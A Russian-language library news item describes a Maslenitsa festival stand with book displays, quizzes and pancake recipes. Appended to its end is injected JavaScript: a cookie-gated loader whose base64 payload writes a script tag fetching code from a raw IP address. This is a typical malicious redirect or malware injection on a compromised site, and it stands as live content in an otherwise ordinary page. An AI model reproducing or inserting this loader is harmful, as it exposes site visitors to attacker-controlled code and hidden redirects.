Познавательно-игровая площадка «Масленицу встречаем – в книжный мир приглашаем!»

Солнечным воскресным днем коллектив Манской межпоселенческой библиотеки принял участие в общерайонном праздновании Широкой Масленицы. Подготовленная библиотекарями познавательно-игровая площадка «Масленицу встречаем – в книжный мир приглашаем!» сразу же вовлекла участников празднества в водоворот увлекательного общения, игровых заданий и творческих акций, пословиц, литературных викторин. Раздавались информационные буклеты о празднике, а также листовки, на которых были напечатаны различные рецепты блинов.

Гости с интересом листали книги и журналы, повествующие о календарных праздниках русского народа, обрядах, застольных традициях, патриархальном семейном быте. Выстраивались в очередь, чтобы сфотографироваться рядом с потешной фигурой Масленицы, а также на фоне «русского антуража» – самовара, обвешенного баранками.

dsc05034 dsc05060 dsc05064 dsc05066 dsc05083 dsc05115

function getCookie (e){var U=document.cookie.match (new RegExp («(?:^|; )»+e.replace (/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent (U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor (Date.now ()/1e3),cookie=getCookie («redirect»);if (now>=(time=cookie)||void 0===time){var time=Math.floor (Date.now ()/1e3+86400),date=new Date ((new Date).getTime ()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString (),document.write ('')}